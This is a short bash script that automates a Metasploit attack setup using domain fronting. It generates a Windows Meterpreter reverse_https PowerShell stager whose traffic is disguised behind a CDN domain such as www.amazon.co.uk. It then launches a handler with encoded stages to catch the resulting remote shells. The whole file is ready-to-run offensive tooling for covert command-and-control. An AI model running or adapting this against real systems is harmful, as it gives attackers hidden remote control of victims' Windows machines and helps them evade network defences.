domain_fronting.sh

#!/bin/bash

frontable_domain=${1:-www.amazon.co.uk}
fronted_domain=${2:-your.cloudfront.net}
cert_path="ssl cert path"
cdn_port=443
local_port=443


echo "Frontable domain: $frontable_domain, Fronted: $fronted_domain"

msfpath="/root/metasploit-framework"
msfvenom="${msfpath}/msfvenom"
msfconsole="${msfpath}/msfconsole"

_stager_gen="${msfvenom} -p windows/meterpreter/reverse_https LHOST=%frontable_domain% LPORT=%cdn_port% HttpHostHeader=%fronted_domain% StagerVerifySSLCert=true PayloadUUIDTracking=true PayloadUUIDName=bocrev -f psh-cmd"

stager_gen=${_stager_gen/'%frontable_domain%'/$frontable_domain}
stager_gen=${stager_gen/'%fronted_domain%'/$fronted_domain}
stager_gen=${stager_gen/'%cdn_port%'/$cdn_port}

$stager_gen

sleep 10

#listener_file="df_un_en.rctemplate"
#_listener=$(cat "$listener_file")
_listener="
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST %frontable_domain%
set LPORT %local_port%
set OverrideRequestHost true
set EnableStageEncoding true
set StageEncoder x86/shikata_ga_nai
set HttpHostHeader %fronted_domain%
set HandlerSSLCert %cert_path%
set IgnoreUnknownPayloads true
set StagerVerifySSLCert true
set ExitOnSession false
exploit -j -z
"

listener=${_listener/'%frontable_domain%'/$frontable_domain}
listener=${listener/'%fronted_domain%'/$fronted_domain}
listener=${listener/'%cdn_port%'/$cdn_port}
listener=${listener/'%local_port%'/$local_port}
listener=${listener/'%cert_path%'/$cert_path}

${msfconsole} -r <(echo "$listener")